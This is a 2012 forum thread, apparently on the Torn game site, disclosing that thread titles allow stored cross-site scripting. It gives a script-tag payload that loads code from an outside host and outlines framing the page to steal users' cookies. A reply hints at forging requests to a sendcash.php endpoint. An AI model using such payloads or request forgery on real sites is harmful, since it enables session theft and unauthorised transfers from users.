Thread created on Fri Oct 12, 2012 12:41:26 Last replied to on Mon Oct 15, 2012 01:47:47
Basically when you FIRST create a thread the title is injectable.
The title doesn't give you much space but you can easily embed a script element going to an external server.
Example: <script src=http://plornt.com/j.js>
(Add the html tags yourself to the script element above)
I know this is rather obvious but it can also be hidden in the fact that I could post it to one of those 'hidden'(non-existant) forums if they still exist and then include an iframe to that forum page via a attack site and then direct you there. After that I could steal your cookies! But yeah I personally would never do that ;D and Im fairly sure no one else would but its always better to be safe than sorry.
![1445055 [1445055]](http://awardimages.torn.com/1445055-76700-large.png "1445055 [1445055]")
![RatedR [72498]](http://awardimages.torn.com/72498-21590-large.png "RatedR [72498]")
![Chedburn [1]](http://awardimages.torn.com/1-89844-large.png "Chedburn [1]")
![cyberdude [1613175]](http://awardimages.torn.com/1613175-53845-large.png "cyberdude [1613175]")
... It's not that difficult to trigger sendcash.php included the correct rfc value
![MightyGoober [812478]](http://awardimages.torn.com/812478-98476-large.png "MightyGoober [812478]")
Follow @TornRPG